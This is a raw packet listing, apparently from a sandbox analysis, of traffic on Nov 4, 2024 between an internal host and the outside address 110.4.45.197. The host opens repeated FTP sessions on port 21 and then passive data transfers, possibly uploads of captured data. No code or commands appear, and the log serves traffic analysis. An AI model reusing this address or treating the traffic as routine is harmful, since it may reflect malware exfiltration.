                                                                                                          Nov 4, 2024 21:26:44.236603022 CET5799750018110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:44.236615896 CET5799750018110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:44.236638069 CET5799750018110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:44.237298965 CET5799750018110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:44.237377882 CET5001857997192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:26:44.289643049 CET4973521192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:26:44.641707897 CET5002321192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:26:44.647551060 CET2150023110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:44.647639990 CET5002321192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:26:44.647826910 CET5002321192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:26:44.652883053 CET2150023110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:44.652935982 CET5002321192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:26:45.020203114 CET2149735110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:45.088752031 CET4973521192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:26:51.670495033 CET4973521192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:26:51.675405979 CET2149735110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:52.019615889 CET2149735110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:52.020286083 CET5002661072192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:26:52.025171041 CET6107250026110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:52.025238991 CET5002661072192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:26:52.025342941 CET4973521192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:26:52.030245066 CET2149735110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:52.943694115 CET2149735110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:52.944009066 CET5002661072192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:26:52.949037075 CET6107250026110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:52.949125051 CET6107250026110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:52.949135065 CET6107250026110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:52.949153900 CET5002661072192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:26:52.949179888 CET5002661072192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:26:52.949203968 CET6107250026110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:52.949213982 CET6107250026110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:52.949223995 CET6107250026110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:52.949248075 CET5002661072192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:26:52.949273109 CET5002661072192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:26:52.949282885 CET5002661072192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:26:52.949354887 CET6107250026110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:52.949364901 CET6107250026110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:52.949373960 CET6107250026110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:52.949383974 CET6107250026110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:52.949398041 CET5002661072192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:26:52.949424028 CET5002661072192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:26:52.949424028 CET5002661072192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:26:52.954066038 CET6107250026110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:52.954116106 CET6107250026110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:52.954118013 CET5002661072192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:26:52.954161882 CET5002661072192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:26:52.954277992 CET6107250026110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:52.954288006 CET6107250026110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:52.954296112 CET6107250026110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:52.954304934 CET6107250026110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:52.954319000 CET5002661072192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:26:52.954354048 CET5002661072192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:26:52.954354048 CET5002661072192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:26:52.954969883 CET6107250026110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:52.955030918 CET5002661072192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:26:52.955566883 CET6107250026110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:52.955626965 CET5002661072192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:26:52.959258080 CET6107250026110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:52.959311008 CET6107250026110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:52.959323883 CET5002661072192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:26:52.959362984 CET5002661072192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:26:52.959419966 CET6107250026110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:52.959460020 CET5002661072192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:26:52.960189104 CET6107250026110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:52.960237026 CET5002661072192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:26:52.960258961 CET6107250026110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:52.960514069 CET6107250026110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:52.961163044 CET6107250026110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:52.964343071 CET6107250026110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:52.964363098 CET6107250026110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:52.964493036 CET6107250026110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:52.965082884 CET6107250026110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:52.965092897 CET6107250026110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:52.966165066 CET6107250026110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:52.966214895 CET5002661072192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:26:53.088542938 CET4973521192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:26:53.722090960 CET2149735110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:53.792846918 CET4973521192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:26:56.060810089 CET5002721192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:26:56.066885948 CET2150027110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:56.066970110 CET5002721192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:26:56.070226908 CET5002721192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:26:56.077003002 CET2150027110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:56.077083111 CET5002721192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:26:56.157516956 CET4973521192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:26:56.163002968 CET2149735110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:56.507267952 CET2149735110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:56.507849932 CET5002863370192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:26:56.512981892 CET6337050028110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:56.513071060 CET5002863370192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:26:56.513139009 CET4973521192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:26:56.518682957 CET2149735110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:57.422035933 CET2149735110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:57.423206091 CET5002863370192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:26:57.428293943 CET6337050028110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:57.428347111 CET6337050028110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:57.428356886 CET6337050028110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:57.428375959 CET6337050028110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:57.428385973 CET6337050028110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:57.428395033 CET6337050028110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:57.428432941 CET5002863370192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:26:57.428440094 CET6337050028110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:57.428459883 CET5002863370192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:26:57.428469896 CET6337050028110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:57.428484917 CET6337050028110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:57.428502083 CET5002863370192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:26:57.428599119 CET5002863370192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:26:57.428713083 CET6337050028110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:57.428925037 CET5002863370192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:26:57.433453083 CET6337050028110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:57.433526993 CET6337050028110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:57.433540106 CET6337050028110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:57.433547974 CET6337050028110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:57.433557034 CET6337050028110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:57.433571100 CET5002863370192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:26:57.433619976 CET5002863370192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:26:57.433686972 CET6337050028110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:57.433820009 CET6337050028110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:57.434087038 CET5002863370192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:26:57.434191942 CET6337050028110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:57.438599110 CET6337050028110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:57.438762903 CET6337050028110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:57.438987017 CET6337050028110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:57.439068079 CET6337050028110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:57.439088106 CET6337050028110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:57.439261913 CET6337050028110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:57.439929008 CET6337050028110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:57.441179037 CET5002863370192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:26:57.494576931 CET4973521192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:26:58.176453114 CET2149735110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:26:58.289685011 CET4973521192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:27:02.209230900 CET5002921192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:27:02.214783907 CET2150029110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:02.214869976 CET5002921192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:27:02.215329885 CET5002921192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:27:02.220307112 CET2150029110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:02.220367908 CET5002921192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:27:10.904073954 CET4973521192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:27:10.909151077 CET2149735110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:11.253354073 CET2149735110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:11.253901958 CET5003052997192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:27:11.258809090 CET5299750030110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:11.262634993 CET5003052997192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:27:11.262636900 CET4973521192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:27:11.267632008 CET2149735110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:12.201129913 CET2149735110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:12.201467991 CET5003052997192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:27:12.206707954 CET5299750030110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:12.206768036 CET5299750030110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:12.206778049 CET5299750030110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:12.206788063 CET5299750030110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:12.206809998 CET5299750030110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:12.206820965 CET5299750030110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:12.206820011 CET5003052997192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:27:12.206831932 CET5299750030110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:12.206841946 CET5299750030110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:12.206845999 CET5003052997192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:27:12.206856012 CET5299750030110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:12.206898928 CET5003052997192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:27:12.206935883 CET5003052997192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:27:12.207055092 CET5299750030110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:12.207094908 CET5003052997192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:27:12.211889982 CET5299750030110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:12.211941957 CET5299750030110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:12.211951971 CET5299750030110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:12.211952925 CET5003052997192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:27:12.211962938 CET5299750030110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:12.211971998 CET5299750030110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:12.211991072 CET5003052997192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:27:12.212028027 CET5003052997192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:27:12.212078094 CET5299750030110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:12.212086916 CET5299750030110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:12.212126017 CET5003052997192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:27:12.212162971 CET5003052997192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:27:12.212271929 CET5299750030110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:12.212330103 CET5003052997192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:27:12.217722893 CET5299750030110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:12.218266010 CET5299750030110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:12.219208002 CET5299750030110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:12.219332933 CET5003052997192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:27:12.289716959 CET4973521192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:27:12.980257988 CET2149735110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:13.180394888 CET4973521192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:27:19.153726101 CET4973521192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:27:19.160250902 CET2149735110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:19.517566919 CET2149735110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:19.518552065 CET5003149859192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:27:19.523463964 CET4985950031110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:19.523608923 CET5003149859192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:27:19.523673058 CET4973521192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:27:19.528733015 CET2149735110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:19.845097065 CET5003221192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:27:19.850440025 CET2150032110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:19.852694035 CET5003221192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:27:19.856864929 CET5003221192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:27:19.861867905 CET2150032110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:19.864717007 CET5003221192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:27:20.061707973 CET5003321192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:27:20.067055941 CET2150033110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:20.067130089 CET5003321192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:27:20.067466021 CET5003321192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:27:20.072511911 CET2150033110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:20.072571039 CET5003321192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:27:20.464711905 CET2149735110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:20.464972973 CET5003149859192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:27:20.470247984 CET4985950031110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:20.470261097 CET4985950031110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:20.470273972 CET4985950031110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:20.470283985 CET4985950031110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:20.470313072 CET5003149859192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:27:20.470336914 CET5003149859192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:27:20.470367908 CET5003149859192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:27:20.470635891 CET4985950031110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:20.470647097 CET4985950031110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:20.470657110 CET4985950031110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:20.470669031 CET4985950031110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:20.470683098 CET4985950031110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:20.470685959 CET5003149859192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:27:20.470693111 CET4985950031110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:20.470721006 CET5003149859192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:27:20.470750093 CET5003149859192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:27:20.475291014 CET4985950031110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:20.475318909 CET4985950031110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:20.475339890 CET5003149859192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:27:20.475351095 CET4985950031110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:20.475361109 CET4985950031110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:20.475373030 CET4985950031110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:20.475378990 CET5003149859192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:27:20.475383043 CET4985950031110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:20.475424051 CET5003149859192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:27:20.475438118 CET5003149859192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:27:20.475447893 CET4985950031110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:20.475497007 CET5003149859192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:27:20.475632906 CET4985950031110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:20.475682020 CET5003149859192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:27:20.475712061 CET4985950031110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:20.475765944 CET5003149859192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:27:20.475867987 CET4985950031110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:20.475878000 CET4985950031110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:20.475915909 CET5003149859192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:27:20.480830908 CET4985950031110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:20.481044054 CET4985950031110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:20.481059074 CET4985950031110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:20.481081009 CET4985950031110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:20.481115103 CET4985950031110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:20.481125116 CET4985950031110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:20.481192112 CET4985950031110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:20.481487036 CET4985950031110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:20.482161999 CET4985950031110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:20.482208014 CET5003149859192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:27:20.680341005 CET4973521192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:27:21.283404112 CET2149735110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:21.492925882 CET4973521192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:27:27.094959974 CET5003421192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:27:27.100173950 CET2150034110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:27.100246906 CET5003421192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:27:28.014493942 CET2150034110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:28.014645100 CET5003421192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:27:28.019500017 CET2150034110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:28.356697083 CET2150034110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:28.362658978 CET5003421192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:27:28.367646933 CET2150034110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:28.732450962 CET2150034110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:28.734714985 CET5003421192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:27:28.739526987 CET2150034110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:29.074615955 CET2150034110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:29.076683044 CET5003421192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:27:29.081657887 CET2150034110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:29.416821957 CET2150034110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:29.416964054 CET5003421192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:27:29.421859980 CET2150034110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:29.757000923 CET2150034110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:29.757158041 CET5003421192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:27:29.762212038 CET2150034110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:30.097412109 CET2150034110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:30.102657080 CET5003554487192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:27:30.107516050 CET5448750035110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:30.108760118 CET5003554487192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:27:30.108757973 CET5003421192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:27:30.113867998 CET2150034110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:31.024893999 CET2150034110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:31.032742977 CET5003554487192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:27:31.037775993 CET5448750035110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:31.037833929 CET5448750035110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:31.037904978 CET5448750035110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:31.037942886 CET5003554487192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:27:31.037993908 CET5448750035110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:31.038005114 CET5448750035110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:31.038014889 CET5448750035110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:31.038058043 CET5003554487192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:27:31.038090944 CET5448750035110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:31.038101912 CET5448750035110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:31.038125992 CET5003554487192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:27:31.038201094 CET5448750035110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:31.038211107 CET5448750035110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:31.038228035 CET5003554487192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:27:31.040679932 CET5003554487192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:27:31.042747974 CET5448750035110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:31.042831898 CET5448750035110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:31.042845011 CET5448750035110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:31.042855024 CET5448750035110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:31.042939901 CET5448750035110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:31.042951107 CET5448750035110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:31.042989969 CET5003554487192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:27:31.043050051 CET5448750035110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:31.043059111 CET5448750035110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:31.043064117 CET5448750035110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:31.043092012 CET5003554487192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:27:31.043158054 CET5448750035110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:31.043217897 CET5003554487192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:27:31.043426991 CET5448750035110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:31.044645071 CET5003554487192.168.2.4110.4.45.197
                                                                                                          Nov 4, 2024 21:27:31.045651913 CET5448750035110.4.45.197192.168.2.4
                                                                                                          Nov 4, 2024 21:27:31.046171904 CET5448750035110.4.45.197192.168.2.4
